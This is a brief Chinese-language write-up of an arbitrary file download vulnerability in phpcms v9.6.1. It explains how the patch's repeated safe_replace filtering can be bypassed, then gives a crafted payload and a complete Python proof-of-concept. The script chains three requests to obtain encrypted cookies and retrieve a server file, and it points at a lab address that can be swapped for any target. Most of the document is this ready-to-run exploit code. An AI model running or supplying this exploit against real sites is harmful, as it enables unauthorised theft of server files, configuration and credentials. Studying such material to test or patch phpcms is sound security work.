v9.6.1修复了9.6.0的注入和上传漏洞。
不过修复时对变量的校验出现了问题，因此该漏洞仅存在于 v9.6.1（9.6.0 与更早版本走的是另一条利用链）。漏洞的分析及修补方案见安全客。
参数过滤过程（每一步 safe_replace 之后 f 参数的实际值）：
swfupload_json -> safe_replace($_GET['src']) // f=p%3%252%270c
-> down->init() -> safe_replace($a_k) // f=p%3%20C
-> down->download() -> safe_replace($a_k) // f=p%3C
- 将9.6.0的payload改成s=./phpcms/modules/content/down.ph&f=p%3%25252%2*70C即可
#POC
#coding:utf-8
import re
import sys

import requests
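# PoC for the phpcms v9.6.1 down.php arbitrary file download described
# above (three requests: fetch the encrypted userid cookie, have
# swfupload_json encrypt the crafted src into an a_k cookie, then let
# down.php hand out a download link).  Use only against systems you are
# authorised to test.

url = 'http://192.168.42.133/phpcms/install_package/index.php'

# Raw, already percent-encoded src value.  It is deliberately kept out of
# requests' ``params=`` handling (which would re-encode the '%' signs and
# break the multi-round decoding chain traced in the write-up above).
PAYLOAD = ('%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6'
           '%26s%3D./phpcms/modules/content/down.ph&f=p%3%25252%2*70C')


def _cookie_value(cookies, fragment):
    """Return the value of the first cookie whose name contains *fragment*.

    *cookies* may be a requests cookie jar or any mapping of name -> value.
    The match is by substring, as in the original PoC -- presumably because
    the cookie name carries an install-specific prefix.  Returns ``None``
    when no such cookie exists (the original script would have raised a
    NameError further down instead).
    """
    for name, value in cookies.items():
        if fragment in name:
            return value
    return None


def _first_href(html):
    """Return the target of the first ``<a href="...">`` in *html*, or ``None``."""
    match = re.search(r'<a href="(.+?)"', html)
    return match.group(1) if match else None


def main():
    """Run the exploit chain against ``url`` and dump the downloaded file to stdout."""
    sess = requests.session()

    # Step 1: a plain WAP index request sets a *_siteid cookie whose value is
    # the (once-encrypted) $this->userid that the attachment endpoint checks.
    resp = sess.get(url, params={'m': 'wap', 'c': 'index', 'siteid': '1'})
    userid = _cookie_value(resp.cookies, '_siteid')
    if userid is None:
        raise SystemExit('no *_siteid cookie in response - is this a phpcms install?')

    # Step 2: swfupload_json runs safe_replace() on src and returns it, encrypted,
    # in a *_att_json cookie; that value is the a_k consumed by down.php.
    # The URL is built by hand so the pre-encoded PAYLOAD reaches the server as-is.
    encode_url = '{}?m=attachment&c=attachments&a=swfupload_json&aid=1&src={}'.format(url, PAYLOAD)
    resp = sess.post(encode_url, data={'userid_flash': userid})
    a_k = _cookie_value(resp.cookies, '_att_json')
    if a_k is None:
        raise SystemExit('no *_att_json cookie in response - target may be patched or userid rejected')

    # Step 3: down->init() decodes a_k and the page now carries the download link.
    # ``.text`` rather than ``.content`` so the str regex also works on Python 3.
    resp = sess.get(url, params={'m': 'content', 'c': 'down', 'a_k': a_k})
    link = _first_href(resp.text)
    if link is None:
        raise SystemExit('no download link found in down.php response')

    # Same concatenation as the original PoC; NOTE(review): this assumes the
    # href is relative to index.php -- adjust if the target returns an absolute URL.
    body = sess.get(url + link).content
    # Write raw bytes so the fetched file is not mangled by text decoding
    # (works on both Python 2 and 3 stdout objects).
    out = getattr(sys.stdout, 'buffer', sys.stdout)
    out.write(body)


if __name__ == '__main__':
    main()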